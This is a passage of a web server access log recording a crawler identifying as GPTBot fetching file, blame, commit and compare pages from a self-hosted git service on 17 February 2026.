74.7.227.38] [Length 13134] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:14:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10553] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:14:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10582] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10417] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13045] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:14:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:14:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125671] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 30153] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:14:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" +[17/Feb/2026:14:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11326] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" +[17/Feb/2026:14:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10488] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:14:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:14:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:14:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11459] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14346] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" +[17/Feb/2026:14:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 18096] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:14:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:14:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10395] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 36212] [Gzip 15.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:14:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" +[17/Feb/2026:14:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 11628] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:14:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:14:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10583] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 769] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:14:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" +[17/Feb/2026:14:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:14:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10859] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:14:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" +[17/Feb/2026:14:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10830] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:14:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10493] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" +[17/Feb/2026:14:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10860] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:14:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 626375] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 626452] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10010] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" +[17/Feb/2026:14:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9977] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" +[17/Feb/2026:14:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 